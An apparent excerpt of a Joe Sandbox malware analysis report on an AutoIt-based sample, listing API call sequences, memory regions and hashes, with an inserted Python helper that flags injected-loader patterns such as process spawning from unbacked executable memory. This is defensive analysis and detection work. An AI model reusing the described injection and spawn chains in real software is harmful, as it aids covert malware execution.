                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: 8ee4a27df8bbe23c17aef43a97db52037abdb2ccd04f2bccdbac688e1ff2c131
                          • Instruction ID: 96ffdfa2b878e6e573aa0089c4756aa6fd2a9f1126799ef28ea6a493e4fae8d8
                          • Opcode Fuzzy Hash: 8ee4a27df8bbe23c17aef43a97db52037abdb2ccd04f2bccdbac688e1ff2c131
                          • Instruction Fuzzy Hash: 89F0AF24A0021DE7CB04B6A8F85ADAE7B6C6E00310B604535F824965D3EF7DDB6586E1
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 02531045
                          • ExitProcess.KERNEL32(00000000), ref: 02531064
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CreateExit
                          • String ID: D
                          • API String ID: 126409537-2746444292
                          • Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                          • Instruction ID: cabb0a12a48dd053fdc07ac4903703e77f54f9545eb92383b0a71b522864cf3c
                          • Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                          • Instruction Fuzzy Hash: E6F0EC7254424CABDB60DFE0CC49FEE777CBF44701F008508FB0ADA180DA789A088B65
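The two functions above that live at 02530000 (the CreateFileW / VirtualAlloc / ReadFile routine and this CreateProcessW / ExitProcess routine) sit in a dump the report marks "based on PE: false", which is the classic signature of unpacked or injected code rather than the AutoIt interpreter image at 00700000. The following triage helper is an added example, not part of the Joe Sandbox report and not code from the analysed sample. It decodes the .sdmp descriptors and per-function API lists quoted on this page and flags regions that look like a loader stage. It assumes, because the report does not document it, that a dump name has the layout proc.run.dump-id.base.protect.field6.type.field8.sdmp with protect and type carrying the MEMORY_BASIC_INFORMATION values returned by VirtualQuery; that reading fits every name on this page (0x40 = PAGE_EXECUTE_READWRITE, 0x20000 = MEM_PRIVATE, 0x1000000 = MEM_IMAGE), and fields 6 and 8 are deliberately left undecoded. The VirtualAlloc and ReadFile lines in the sample input are constructed from the first function's control-flow graph, which names the calls but not their modules.

```python
"""Added triage helper: decode Joe Sandbox .sdmp descriptors and API lists
quoted in this report and flag memory regions that look like injected code.
Assumption (not documented by the report): the 5th dotted field of a dump
name is the page protection and the 7th is the MEM_* region type.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PAGE_EXECUTE = {0x10, 0x20, 0x40, 0x80}   # PAGE_EXECUTE* protections
PAGE_WRITABLE = {0x04, 0x08, 0x40, 0x80}  # PAGE_READWRITE / WRITECOPY variants
MEM_PRIVATE, MEM_IMAGE = 0x20000, 0x1000000

# API sets that, seen together in one function, read like a loader stage.
LOADER_CHAINS = {
    "read payload into fresh memory": {"CreateFileW", "VirtualAlloc", "ReadFile"},
    "spawn child then exit": {"CreateProcessW", "ExitProcess"},
}

SDMP_RE = re.compile(
    r"[0-9A-F]{8}\.[0-9A-F]{8}\.\d+\.(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})"
    r"\.[0-9A-F]{8}\.(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp", re.I)
API_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?([A-Za-z_][A-Za-z0-9_@]*)(?=[.(\s]|$)")


@dataclass
class Region:
    base: int
    protect: int
    type_: int
    pe_backed: bool

    @property
    def private_executable(self) -> bool:
        return self.type_ == MEM_PRIVATE and self.protect in PAGE_EXECUTE

    @property
    def rwx(self) -> bool:
        return self.protect in PAGE_EXECUTE and self.protect in PAGE_WRITABLE


def parse_source_line(line: str) -> Region:
    """Parse one '• Source File: <name>.sdmp, Offset: ..., based on PE: ...' line."""
    m = SDMP_RE.search(line)
    if m is None:
        raise ValueError(f"no .sdmp descriptor in {line!r}")
    pe = re.search(r"based on PE:\s*(true|false)", line, re.I)
    return Region(int(m["base"], 16), int(m["protect"], 16), int(m["type"], 16),
                  pe_backed=bool(pe and pe.group(1).lower() == "true"))


def parse_api_names(api_lines: list[str]) -> set[str]:
    """Collect bare API names from '• Name.MODULE(args), ref: ...' lines."""
    return {m.group(1) for line in api_lines if (m := API_RE.search(line))}


def assess(source_line: str, api_lines: list[str]) -> dict:
    """Combine region traits with matched API chains for one function block."""
    region = parse_source_line(source_line)
    apis = parse_api_names(api_lines)
    findings = []
    if not region.pe_backed and region.private_executable:
        findings.append("executable private memory not backed by a PE")
    if region.rwx:
        findings.append("RWX page")
    findings += [f"API chain: {n}" for n, need in LOADER_CHAINS.items() if need <= apis]
    return {"base": hex(region.base), "pe_backed": region.pe_backed,
            "apis": sorted(apis), "findings": findings}


# Sample input copied from this report; the two lines marked "constructed"
# come from the first function's control-flow graph, which omits the module.
INJECTED_SRC = ("• Source File: 00000000.00000002.2102510492.0000000002530000.00000040."
                "00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false")
INJECTED_APIS_READ = [
    "  • Part of subcall function 025322B0: Sleep.KERNELBASE(000001F4), ref: 025322C1",
    "• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 025324C2",
    "• VirtualAlloc (constructed from the control-flow graph)",
    "• ReadFile (constructed from the control-flow graph)",
]
INJECTED_APIS_SPAWN = [
    "• CreateProcessW.KERNELBASE(?,00000000), ref: 02531045",
    "• ExitProcess.KERNEL32(00000000), ref: 02531064",
]
IMAGE_SRC = ("• Source File: 00000000.00000002.2101900879.0000000000701000.00000020."
             "00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true")
IMAGE_APIS = [
    "• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0077302F",
    "• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00773044",
]


def triage_examples() -> dict[str, dict]:
    """Run the three blocks above; only the two at 02530000 should be flagged."""
    return {"loader_read": assess(INJECTED_SRC, INJECTED_APIS_READ),
            "loader_spawn": assess(INJECTED_SRC, INJECTED_APIS_SPAWN),
            "autoit_tempfile": assess(IMAGE_SRC, IMAGE_APIS)}


if __name__ == "__main__":
    for name, result in triage_examples().items():
        print(name, result["base"], result["findings"])
```

The PE-backed AutoIt interpreter function (GetTempPathW / GetTempFileNameW with the "aut" prefix) produces no findings even though it is part of the same malicious process: the signal is the combination of a private, executable, non-image region with a file-read-into-memory or spawn-and-exit chain, not any single API on its own. Field 6 of the dump name is 00000001 for image regions and 00001000 for the private one, so it is not MEM_COMMIT and is left alone rather than guessed at.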
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0077302F
                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00773044
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 58555908a0eae7fdf910019e0645952c19ca2b55ee7f7378bf639a68c87b118c
                          • Instruction ID: f35556ee28e8781fd0cd024ca35b8a25a8bbc306aecfa5dc621937fabfec24cf
                          • Opcode Fuzzy Hash: 58555908a0eae7fdf910019e0645952c19ca2b55ee7f7378bf639a68c87b118c
                          • Instruction Fuzzy Hash: E5D05EB250032877DE20A7A4AC4EFCB3B6CEB04750F0042A2B655E6091DAB89985CBE4
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007882F5
                          • TerminateProcess.KERNEL32(00000000), ref: 007882FC
                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 007884DD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process$CurrentFreeLibraryTerminate
                          • String ID:
                          • API String ID: 146820519-0
                          • Opcode ID: 660fe0b799875d69aa92651a1d17673e753434fc1230ad973b99c4246e517b50
                          • Instruction ID: bdc69b6dae5aa806591a8dfa588ccec56ceb63292f08dfa533311967a29c4013
                          • Opcode Fuzzy Hash: 660fe0b799875d69aa92651a1d17673e753434fc1230ad973b99c4246e517b50
                          • Instruction Fuzzy Hash: 4A127B71A08341DFC754DF28C484B2ABBE1FF84314F44895DE8998B292DB39ED45CB92
                          APIs
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
                            • Part of subcall function 00701BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22
                            • Part of subcall function 00701B4A: RegisterWindowMessageW.USER32(00000004,?,007012C4), ref: 00701BA2
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0070136A
                          • OleInitialize.OLE32 ref: 00701388
                          • CloseHandle.KERNEL32(00000000,00000000), ref: 007424AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                          • String ID:
                          • API String ID: 1986988660-0
                          • Opcode ID: 0e4884f559f5fa6d298a16237066790573472bd25258e20330f830c96faeee09
                          • Instruction ID: a4e066809f6b0f41a633379466635b1f3c958a167351c2291cfeeb3a73f7df93
                          • Opcode Fuzzy Hash: 0e4884f559f5fa6d298a16237066790573472bd25258e20330f830c96faeee09
                          • Instruction Fuzzy Hash: D371A9B4A02240EEC784DFB9B9496553BF0AB883643C4C26BD00BC73A2EB3C5461CF59
                          APIs
                          • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0070556D
                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0070557D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: acca5939bb2f824b7e7d0018b2e2d251eb2d96d32bdc2534d4c502bb2d79db85
                          • Instruction ID: a7a374b96cb0bbb9335b70a0d73ffdddc4852dfb62ef9c3cfd297baae87254fe
                          • Opcode Fuzzy Hash: acca5939bb2f824b7e7d0018b2e2d251eb2d96d32bdc2534d4c502bb2d79db85
                          • Instruction Fuzzy Hash: E2312C75A00609FFDB14CF28C880B9AB7B6FB44314F148629E91997280D775FDA4CF90
                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,007385CC,?,007C8CC8,0000000C), ref: 00738704
                          • GetLastError.KERNEL32(?,007385CC,?,007C8CC8,0000000C), ref: 0073870E
                          • __dosmaperr.LIBCMT ref: 00738739
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                          • String ID:
                          • API String ID: 490808831-0
                          • Opcode ID: daf8c77105727132c271b1d3b7340197778b69ffe1222fda44566757cee08b7f
                          • Instruction ID: 114a618037103a476d1cfd97a50b7fc7250d9119a190d6cf901aebc7eb3256fd
                          • Opcode Fuzzy Hash: daf8c77105727132c271b1d3b7340197778b69ffe1222fda44566757cee08b7f
                          • Instruction Fuzzy Hash: 30018E33605720D7F6B06334684B77E27594B82778F39011AF8158B0D3DEBDCC818192
                          APIs
                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00772CD4,?,?,?,00000004,00000001), ref: 00772FF2
                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00772CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00773006
                          • CloseHandle.KERNEL32(00000000,?,00772CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0077300D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 02fa9b73dbee96d6b393da137b8d440f6a4afeb0dc37aea736620141ce8cc718
                          • Instruction ID: 87f714cd80b2a3e99c9c396e1bcb38fb1903cda886fe934726a8f60b6eca9819
                          • Opcode Fuzzy Hash: 02fa9b73dbee96d6b393da137b8d440f6a4afeb0dc37aea736620141ce8cc718
                          • Instruction Fuzzy Hash: 72E0863228021477DA311755BC0EF8B3A1CD786B71F118211F719750D046A5150293AC
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 007117F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Init_thread_footer
                          • String ID: CALL
                          • API String ID: 1385522511-4196123274
                          • Opcode ID: c71776bd7f63dfa0add2f895046524114310dfa85739ce1c6033d23b7b3b8b0b
                          • Instruction ID: 66e4db4943a641686998b4d3219611b4f5ff31879cce3da1649159a638d878bf
                          • Opcode Fuzzy Hash: c71776bd7f63dfa0add2f895046524114310dfa85739ce1c6033d23b7b3b8b0b
                          • Instruction Fuzzy Hash: E522BD70608341DFC714CF18C484AAABBF1BF85314F94895DF9968B3A2D779E895CB82
                          APIs
                          • _wcslen.LIBCMT ref: 00776F6B
                            • Part of subcall function 00704ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EFD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: LibraryLoad_wcslen
                          • String ID: >>>AUTOIT SCRIPT<<<
                          • API String ID: 3312870042-2806939583
                          • Opcode ID: 0954da4d842444b42715d49e737413a7c5e3ba76935c361542f733cea6fb9078
                          • Instruction ID: be837a65aa11e21f4ee3a0762b9ef8ded8d859433f45373e00d35b7a427b03e0
                          • Opcode Fuzzy Hash: 0954da4d842444b42715d49e737413a7c5e3ba76935c361542f733cea6fb9078
                          • Instruction Fuzzy Hash: 4AB18371108201DFCB18EF20C89596EB7E5BF94350F048A5DF59A972E2DB38ED45CB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID: EA06
                          • API String ID: 2638373210-3962188686
                          • Opcode ID: 5671f183bdfbeba1a9fe89bb8291da959a6f8cc48f1f7e7b58fc0ed30a878620
                          • Instruction ID: 8c806abd8475b6c91b2d03ae11fab6a70624f55eedb80109b3a028c72968ff62
                          • Opcode Fuzzy Hash: 5671f183bdfbeba1a9fe89bb8291da959a6f8cc48f1f7e7b58fc0ed30a878620
                          • Instruction Fuzzy Hash: BC01B971904268BEDF18D7A8C85AEAE7BF89B15311F00459EE192D2181E578E7148B60
                          APIs
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00703908
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconNotifyShell_
                          • String ID:
                          • API String ID: 1144537725-0
                          • Opcode ID: caf12b09a3949e84ed59bc8075615dea24a5653ea9b371e8b6dbf000c6ac3841
                          • Instruction ID: a4264fb4ff1feac87c74587a8210fe824317e5d8446aff51828fc6c5199744f1
                          • Opcode Fuzzy Hash: caf12b09a3949e84ed59bc8075615dea24a5653ea9b371e8b6dbf000c6ac3841
                          • Instruction Fuzzy Hash: D831BF70605301DFD721DF24D884797BBF8FB49308F004A6EF59A83290E779AA44CB52
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00705773
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00744052
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 4d4e11132f3e2a931d2f057d9821e0e75b146b7e7d4eeb9fa649082f6f7cb31e
                          • Instruction ID: a4f9abc7cb251127e4b5b86f059e78e0b305515904647277bbeb0966d1ba1559
                          • Opcode Fuzzy Hash: 4d4e11132f3e2a931d2f057d9821e0e75b146b7e7d4eeb9fa649082f6f7cb31e
                          • Instruction Fuzzy Hash: BD015231185225F6E7314A2ADC0EF977F98EF027B0F14C311BA9C5A1E0CBB85855DB94
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00709879,?,?,?), ref: 00706E33
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00709879,?,?,?), ref: 00706E69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: 3200aea5488a1f228f4cfbd845e013dead8b1b65ef86966b9c96984ed7eb051a
                          • Instruction ID: 46f50962ca954b483c6dd8af1347210057ae7da2aa1cfc0506a4b324ebde407c
                          • Opcode Fuzzy Hash: 3200aea5488a1f228f4cfbd845e013dead8b1b65ef86966b9c96984ed7eb051a
                          • Instruction Fuzzy Hash: 0F01BC71304204BFEB196BA9DD1AF7F7AA9DB85700F14413EF106DA1E1E9A4AC008639
                          APIs
                            • Part of subcall function 025308E0: GetFileAttributesW.KERNELBASE(?), ref: 025308EB
                          • CreateDirectoryW.KERNELBASE(?,00000000), ref: 025311B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2102510492.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_2530000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AttributesCreateDirectoryFile
                          • String ID:
                          • API String ID: 3401506121-0
                          • Opcode ID: eaba09c8ce65dda54e360e5c8dec5ecfa7a10a04309edb6bf16c39a3a4da400e
                          • Instruction ID: 930b26e7f50b9182c6973c28d6237b230fd6b4907d8f464ab7d55ea959697509
                          • Opcode Fuzzy Hash: eaba09c8ce65dda54e360e5c8dec5ecfa7a10a04309edb6bf16c39a3a4da400e
                          • Instruction Fuzzy Hash: 07516631A1020997DF14EFB0C854BEE773AFF58700F005569B609EB290EB799B54CBA5
                          APIs
                            • Part of subcall function 00704E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E9C
                            • Part of subcall function 00704E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00704EAE
                            • Part of subcall function 00704E90: FreeLibrary.KERNEL32(00000000,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EC0
                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EFD
                            • Part of subcall function 00704E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E62
                            • Part of subcall function 00704E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00704E74
                            • Part of subcall function 00704E59: FreeLibrary.KERNEL32(00000000,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E87
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                           • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Library$Load$AddressFreeProc
                          • String ID:
                          • API String ID: 2632591731-0
                          • Opcode ID: d13559f202c12981918ea1e41a88216e30caa4b2d56e461778a70d7ee4c6dfcd
